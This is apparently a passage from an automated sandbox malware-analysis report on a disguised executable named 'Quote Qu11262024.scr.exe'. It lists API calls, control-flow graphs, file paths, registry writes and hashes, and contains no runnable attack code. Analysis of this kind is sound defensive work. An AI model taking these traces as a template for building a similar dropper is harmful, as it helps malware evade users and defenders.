                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                    • API String ID: 3449924974-1229045261
                                                                                                    • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                    • Instruction ID: 1519484df5af4c351f4ba2731212b7ab5e92ba1244ff1540d6ffe77672abb3e3
                                                                                                    • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                    • Instruction Fuzzy Hash: A3011671D10219EADF10DFA5C904BEFBBB8EF14314F00803AD944B6280E7B89608DFA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 653 4063fe-40641e GetSystemDirectoryA 654 406420 653->654 655 406422-406424 653->655 654->655 656 406434-406436 655->656 657 406426-40642e 655->657 659 406437-406469 wsprintfA LoadLibraryExA 656->659 657->656 658 406430-406432 657->658 658->659
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406415
                                                                                                    • wsprintfA.USER32 ref: 0040644E
                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406462
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                    • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                    • Instruction ID: 2838f6cf9fc6cc64fdd2d144a05328c337edde397d0505f880392109b3eca7ab
                                                                                                    • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                    • Instruction Fuzzy Hash: B5F0F67050061A6BDB149BA8DD0DFFB369CBB08304F54047AA686E10C1EA78D9258B5C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 660 405c9c-405ca6 661 405ca7-405cd2 GetTickCount GetTempFileNameA 660->661 662 405ce1-405ce3 661->662 663 405cd4-405cd6 661->663 665 405cdb-405cde 662->665 663->661 664 405cd8 663->664 664->665
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405CB0
                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405CCA
                                                                                                    Strings
                                                                                                    • nsa, xrefs: 00405CA7
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
                                                                                                    • "C:\Users\user\Desktop\Quote Qu11262024.scr.exe", xrefs: 00405C9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                    • API String ID: 1716503409-3659315066
                                                                                                    • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                    • Instruction ID: 9fa101f3d531236a746c1d52dd979526ee055ed374631d61875a7fee21b22c57
                                                                                                    • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                    • Instruction Fuzzy Hash: 16F082363087086BEB108F55DC04B9B7B98EF91750F14803BFA48DA280D6B599648B58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 666 738e16df-738e171b call 738e1a9c 670 738e1838-738e183a 666->670 671 738e1721-738e1725 666->671 672 738e172e-738e173b call 738e22b5 671->672 673 738e1727-738e172d call 738e2273 671->673 678 738e173d-738e1742 672->678 679 738e176b-738e1772 672->679 673->672 682 738e175d-738e1760 678->682 683 738e1744-738e1745 678->683 680 738e1774-738e1790 call 738e249c call 738e1559 call 738e1266 GlobalFree 679->680 681 738e1792-738e1796 679->681 703 738e17e7-738e17eb 680->703 687 738e1798-738e17de call 738e156b call 738e249c 681->687 688 738e17e0-738e17e6 call 738e249c 681->688 682->679 689 738e1762-738e1763 call 738e2c7b 682->689 685 738e174d-738e174e call 738e29c0 683->685 686 738e1747-738e1748 683->686 698 738e1753 685->698 691 738e174a-738e174b 686->691 692 738e1755-738e175b call 738e2676 686->692 687->703 688->703 701 738e1768 689->701 691->679 691->685 707 738e176a 692->707 698->701 701->707 708 738e17ed-738e17fb call 738e2462 703->708 709 738e1828-738e182f 703->709 707->679 716 738e17fd-738e1800 708->716 717 738e1813-738e181a 708->717 709->670 714 738e1831-738e1832 GlobalFree 709->714 714->670 716->717 718 738e1802-738e180a 716->718 717->709 719 738e181c-738e1827 call 738e14e2 717->719 718->717 720 738e180c-738e180d FreeLibrary 718->720 719->709 720->717
                                                                                                    APIs
                                                                                                      • Part of subcall function 738E1A9C: GlobalFree.KERNEL32(?), ref: 738E1CEB
                                                                                                      • Part of subcall function 738E1A9C: GlobalFree.KERNEL32(?), ref: 738E1CF0
                                                                                                      • Part of subcall function 738E1A9C: GlobalFree.KERNEL32(?), ref: 738E1CF5
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E178A
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 738E180D
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1832
                                                                                                      • Part of subcall function 738E2273: GlobalAlloc.KERNEL32(00000040,?), ref: 738E22A4
                                                                                                      • Part of subcall function 738E2676: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,738E175B,00000000), ref: 738E2746
                                                                                                      • Part of subcall function 738E156B: lstrcpyA.KERNEL32(?,?,00000000,738E1568,?,00000000,738E16B7,00000000), ref: 738E1581
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                    • Opcode ID: 9aba415ffa5f63c845ed1e21ed5b26085966fedcc53ebfaac5ddd8639857f02d
                                                                                                    • Instruction ID: 35a13c4cdd4784d85286c3e5aa42e124ae0445174b90add1933f01b8cd55be3b
                                                                                                    • Opcode Fuzzy Hash: 9aba415ffa5f63c845ed1e21ed5b26085966fedcc53ebfaac5ddd8639857f02d
                                                                                                    • Instruction Fuzzy Hash: D741C2721807099BDB01AFF8CD85B9637EEBB07711F08C4A8E91B9A1C6CB748545CBA0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 723 401c0a-401c2a call 402aa9 * 2 728 401c36-401c3a 723->728 729 401c2c-401c33 call 402acb 723->729 731 401c46-401c4c 728->731 732 401c3c-401c43 call 402acb 728->732 729->728 734 401c9a-401cc0 call 402acb * 2 FindWindowExA 731->734 735 401c4e-401c6a call 402aa9 * 2 731->735 732->731 748 401cc6 734->748 746 401c8a-401c98 SendMessageA 735->746 747 401c6c-401c88 SendMessageTimeoutA 735->747 746->748 749 401cc9-401ccc 747->749 748->749 750 401cd2 749->750 751 402957-402966 749->751 750->751
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: c8db4ef1de0b1788a349db4a13c6c599e165c4425c0ff8e4c3c4ec4ea7b9bfbf
                                                                                                    • Instruction ID: c3250d5c980cd670a2c14b5a4ff2ab463f1fff6c58a752f95a7fb09de1d44ebe
                                                                                                    • Opcode Fuzzy Hash: c8db4ef1de0b1788a349db4a13c6c599e165c4425c0ff8e4c3c4ec4ea7b9bfbf
                                                                                                    • Instruction Fuzzy Hash: 1521A271E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7885418F28

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 754 4023d6-402407 call 402acb * 2 call 402b5b 761 402957-402966 754->761 762 40240d-402417 754->762 764 402427-40242a 762->764 765 402419-402426 call 402acb lstrlenA 762->765 768 40242c-40243d call 402aa9 764->768 769 40243e-402441 764->769 765->764 768->769 770 402452-402466 RegSetValueExA 769->770 771 402443-40244d call 403059 769->771 776 402468 770->776 777 40246b-402548 RegCloseKey 770->777 771->770 776->777 777->761 779 40271c-402723 777->779 779->761
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000023,00000011,00000002), ref: 00402421
                                                                                                    • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,00000011,00000002), ref: 0040245E
                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseValuelstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp
                                                                                                    • API String ID: 2655323295-4005109940
                                                                                                    • Opcode ID: 731e4c8bb91ccfd5bbd87cd59c57e647ab17d1e066027594de5c21cbbeb13e50
                                                                                                    • Instruction ID: 9e3497a20dc5bb51dbff207d33c7c894ad40322044b9b37abcc663475ade1bcc
                                                                                                    • Opcode Fuzzy Hash: 731e4c8bb91ccfd5bbd87cd59c57e647ab17d1e066027594de5c21cbbeb13e50
                                                                                                    • Instruction Fuzzy Hash: 3211B171E00215BEEB10EFA5DE49EAEBA74EB44718F21843AF505F61D0CAB84D019A28
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00402D8B,00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987980305-0
                                                                                                    • Opcode ID: e039c4123442587a9dcb2e315d205bd3a645e7379a17db1c38e5d0c2e0082835
                                                                                                    • Instruction ID: bf6ce38583783c4e047e41a390d947aca960f525c748a6aadb1ef99b00404d37
                                                                                                    • Opcode Fuzzy Hash: e039c4123442587a9dcb2e315d205bd3a645e7379a17db1c38e5d0c2e0082835
                                                                                                    • Instruction Fuzzy Hash: E121D872A00225A7CF207FA5CE4DBAE76A0AF40358F71413BF611B21D0CBBD4942966E
                                                                                                    APIs
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$Enum
                                                                                                    • String ID:
                                                                                                    • API String ID: 464197530-0
                                                                                                    • Opcode ID: bb7921fdce304558e85d3c83cbc1180cb0f005918818e209791448cb9946af78
                                                                                                    • Instruction ID: effd60b5220b711b9c6c3ccd9c1d0aa654771920be3fafa65f8b7d02a25fd7fc
                                                                                                    • Opcode Fuzzy Hash: bb7921fdce304558e85d3c83cbc1180cb0f005918818e209791448cb9946af78
                                                                                                    • Instruction Fuzzy Hash: 9B115B32504109FBEF129F90CF09F9E7B79AB04340F104032BD45B51E0D7B59E11AA98
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                      • Part of subcall function 004056C1: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes,00000000,00000000,000000F0), ref: 0040163C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes, xrefs: 00401631
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes
                                                                                                    • API String ID: 1892508949-4271999429
                                                                                                    • Opcode ID: 329600f1240a7ef49a182a6d5a71d1f5465659b7c0796468a6a8b207c59c3d3f
                                                                                                    • Instruction ID: 003777cfc860d438aa10b5c3622cdcbd4d2b40555f18fec7cdd3e710871c5a12
                                                                                                    • Opcode Fuzzy Hash: 329600f1240a7ef49a182a6d5a71d1f5465659b7c0796468a6a8b207c59c3d3f
                                                                                                    • Instruction Fuzzy Hash: B0110831204151DBCF217BA54D419BF66B09A92324B29093FE5D1B22E2C63D4942963F
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004061FF,80000002), ref: 00406001
                                                                                                    • RegCloseKey.ADVAPI32(?,?,004061FF,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll), ref: 0040600C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseQueryValue
                                                                                                    • String ID: Call
                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                    • Opcode ID: ea78987ab4143e3e8127ca6c2c7b094aabb1e0d87444735632d7f0bcce771fa2
                                                                                                    • Instruction ID: 248058938384b59202878420bfc667c71701abd24850af96c96afa094bbc62b4
                                                                                                    • Opcode Fuzzy Hash: ea78987ab4143e3e8127ca6c2c7b094aabb1e0d87444735632d7f0bcce771fa2
                                                                                                    • Instruction Fuzzy Hash: 9B01717254020AEBDF22CF61CD05FDB3FA8EF55354F014035F955A2190D678D964CBA4
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406668
                                                                                                    • GlobalAlloc.KERNELBASE(00000040), ref: 00406671
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004066DF
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 004066EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3394109436-0
                                                                                                    • Opcode ID: d3069a353f30b0c3cf1a13fa9ba286ac3029f23eb7527855817e88f6dbda3318
                                                                                                    • Instruction ID: 019f1e726e4079e32dc3d685b446730c6a36abfb0bc55182d259823b7771a22e
                                                                                                    • Opcode Fuzzy Hash: d3069a353f30b0c3cf1a13fa9ba286ac3029f23eb7527855817e88f6dbda3318
